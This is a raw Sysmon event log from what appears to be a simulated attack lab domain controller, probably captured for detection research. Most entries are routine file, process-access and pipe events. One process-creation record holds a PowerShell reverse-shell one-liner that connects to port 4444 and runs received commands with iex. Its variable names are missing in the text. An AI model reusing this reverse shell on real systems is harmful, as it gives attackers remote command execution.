Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CA2055860AF1670F5545E04BF4CB4E7,SHA256=AC6250DDBE411B11E272F1B00E18E4C696CCD3309495F2BDD253E887A31E3358,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765181Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:44.256{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E56FFA1DCC1C5500DC66159973DE02A7,SHA256=4FE19945053A586E99A6642BDAC09608DEDB13D2724B91CC2B56A64A42346576,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765185Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:45.272{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6624C8AE1425E6C21FF921E88DB5F2C2,SHA256=08D9ED1E1B497DFDA154DA6084C77DC414E238D24D4E461DCAA8826D0A17248B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765186Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:46.287{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A278FA2147203E568C0371BBC00B57,SHA256=D384065ACE1B9127BE42E1A0C8C9FA0F352AC3589D98FC7C0D7D7DA7E2E07038,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001765204Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.928{5ABCFE62-842F-603E-0F00-00000000AD01}2966584C:\Windows\system32\svchost.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765203Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.928{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765202Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.897{5ABCFE62-842D-603E-0B00-00000000AD01}6322268C:\Windows\system32\lsass.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765201Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.897{5ABCFE62-842D-603E-0B00-00000000AD01}6322268C:\Windows\system32\lsass.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001765200Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-03 15:27:47.881{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800\PSHost.132592588678191428.5800.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001765199Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.866{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4s1pheim.1tq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765198Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.866{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_hauy1440.xib.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001765197Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.850{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_hauy1440.xib.ps12021-03-03 15:27:47.850 10341000x80000000000000001765196Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.834{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765195Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-92CC-603F-4925-00000000AD01}67845620C:\Windows\system32\conhost.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765194Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765193Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765192Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765191Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765190Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-99F1-603E-7907-00000000AD01}3080348C:\Windows\system32\csrss.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001765189Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-92CC-603F-4825-00000000AD01}57124016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d89331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd33e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d7e54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5ccf4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd52edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd36540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd36540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd28356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd34889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd34425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd33e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d7e54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd1acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd1a2a7(wow64) 154100x80000000000000001765188Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.819{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c " = New-Object System.Net.Sockets.TCPClient('localhost',4444); = .GetStream();[byte[]] = 0..65535|%%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex 2>&1 | Out-String ); = + 'PS ' + (pwd).Path + '> '; = ([text.encoding]::ASCII).GetBytes();.Write(,0,.Length);.Flush()};.Close()"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-92CC-603F-4825-00000000AD01}5712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001765187Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:47.287{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0FBA85D0F912FC6D26C19203E9B20B,SHA256=A785AB8A5FE24718B2218501FF519D08E0D1E7EE1803E1A7AE82A076CDA0DEE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765226Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.881{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DF5983D91CBFE0516CC86D596F7FF28B,SHA256=B45B3A24BA176BF91E975970D8F49B206F49E11F989994E2F729FADF79E1A077,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765225Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.334{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE56F6282FB6033CAEEDF562736AFCB3,SHA256=E91DB95E03CF58471C617543847EDC31C60C9B56614F37ABBC33BA49620B9810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765224Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.272{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001765223Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.162{5ABCFE62-842F-603E-0F00-00000000AD01}2966584C:\Windows\system32\svchost.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765222Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.162{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765221Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.131{5ABCFE62-842D-603E-0B00-00000000AD01}6325764C:\Windows\system32\lsass.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765220Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.131{5ABCFE62-842D-603E-0B00-00000000AD01}6325764C:\Windows\system32\lsass.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001765219Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-03 15:27:48.116{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056\PSHost.132592588680566623.7056.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001765218Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.100{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_rgzlcs2d.je5.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765217Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.100{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_rzbgjhmf.qcf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001765216Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.084{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_rzbgjhmf.qcf.ps12021-03-03 15:27:48.084 10341000x80000000000000001765215Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 